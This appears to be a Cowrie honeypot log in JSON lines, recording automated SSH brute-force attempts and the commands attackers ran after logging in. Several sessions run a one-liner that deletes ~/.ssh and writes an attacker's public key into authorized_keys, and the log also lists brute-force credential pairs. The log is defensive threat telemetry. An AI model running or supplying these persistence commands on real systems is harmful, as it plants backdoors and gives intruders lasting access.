{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":56956,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab0b19574860","protocol":"ssh","message":"New connection: 51.250.72.176:56956 (1.2.3.4:22) [session: ab0b19574860]","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.260015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.260905Z","src_ip":"51.250.72.176","session":"ab0b19574860"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"10b94ca72c10","protocol":"ssh","message":"New connection: 43.156.132.147:52486 (1.2.3.4:22) [session: 10b94ca72c10]","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.266894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.268102Z","src_ip":"43.156.132.147","session":"10b94ca72c10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.290675Z","src_ip":"51.250.72.176","session":"ab0b19574860"}
{"eventid":"cowrie.login.failed","username":"white","password":"pass","message":"login attempt [white/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.449847Z","src_ip":"51.250.72.176","session":"ab0b19574860"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.531887Z","src_ip":"43.156.132.147","session":"10b94ca72c10"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:23.481014Z","src_ip":"51.250.72.176","session":"ab0b19574860"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:51:23.596198Z","src_ip":"43.156.132.147","session":"10b94ca72c10"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:23.861428Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:23.862307Z","src_ip":"43.156.132.147","session":"10b94ca72c10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34591,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b7259aa66c0","protocol":"telnet","message":"New connection: 212.227.125.160:34591 (1.2.3.4:23) [session: 1b7259aa66c0]","sensor":"my-vps","timestamp":"2025-09-09T00:51:47.830466Z"}
{"eventid":"cowrie.session.closed","duration":13.046383619308472,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:00.876778Z","src_ip":"212.227.125.160","session":"1b7259aa66c0"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"4839eca91dc5","protocol":"ssh","message":"New connection: 5.202.105.236:47836 (1.2.3.4:22) [session: 4839eca91dc5]","sensor":"my-vps","timestamp":"2025-09-09T00:52:04.955638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:04.957192Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:05.124330Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@1234567","message":"login attempt [root/Aa@1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:52:05.777914Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:52:06.134919Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.135722Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.136587Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.287722Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:52:06.592743Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.593884Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.737748Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.738730Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":49166,"dst_ip":"1.2.3.4","dst_port":22,"session":"0098870da888","protocol":"ssh","message":"New connection: 5.202.105.236:49166 (1.2.3.4:22) [session: 0098870da888]","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.871076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:06.874755Z","src_ip":"5.202.105.236","session":"0098870da888"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:07.033693Z","src_ip":"5.202.105.236","session":"0098870da888"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:52:07.643199Z","src_ip":"5.202.105.236","session":"0098870da888"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:08.808080Z","src_ip":"5.202.105.236","session":"0098870da888"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":49720,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65b41aa6225","protocol":"ssh","message":"New connection: 5.202.105.236:49720 (1.2.3.4:22) [session: b65b41aa6225]","sensor":"my-vps","timestamp":"2025-09-09T00:52:08.918127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:08.918968Z","src_ip":"5.202.105.236","session":"b65b41aa6225"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:09.086956Z","src_ip":"5.202.105.236","session":"b65b41aa6225"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:52:09.746433Z","src_ip":"5.202.105.236","session":"b65b41aa6225"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:09.877608Z","src_ip":"5.202.105.236","session":"4839eca91dc5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:09.911401Z","src_ip":"5.202.105.236","session":"b65b41aa6225"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":35815,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbe86208d8f4","protocol":"ssh","message":"New connection: 103.100.209.195:35815 (1.2.3.4:22) [session: dbe86208d8f4]","sensor":"my-vps","timestamp":"2025-09-09T00:52:11.910392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:11.919832Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:12.118159Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Ky123456.","message":"login attempt [root/Ky123456.] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:52:12.916523Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:52:13.378397Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:52:13.379135Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:52:13.380209Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:13.587082Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:52:14.051666Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.052335Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.259430Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.260311Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":36337,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb0df8a67a05","protocol":"ssh","message":"New connection: 103.100.209.195:36337 (1.2.3.4:22) [session: bb0df8a67a05]","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.457154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.460665Z","src_ip":"103.100.209.195","session":"bb0df8a67a05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:14.661705Z","src_ip":"103.100.209.195","session":"bb0df8a67a05"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:52:15.488038Z","src_ip":"103.100.209.195","session":"bb0df8a67a05"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:16.693064Z","src_ip":"103.100.209.195","session":"bb0df8a67a05"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":36728,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7a4c1ee6d8","protocol":"ssh","message":"New connection: 103.100.209.195:36728 (1.2.3.4:22) [session: 0c7a4c1ee6d8]","sensor":"my-vps","timestamp":"2025-09-09T00:52:16.893773Z"}
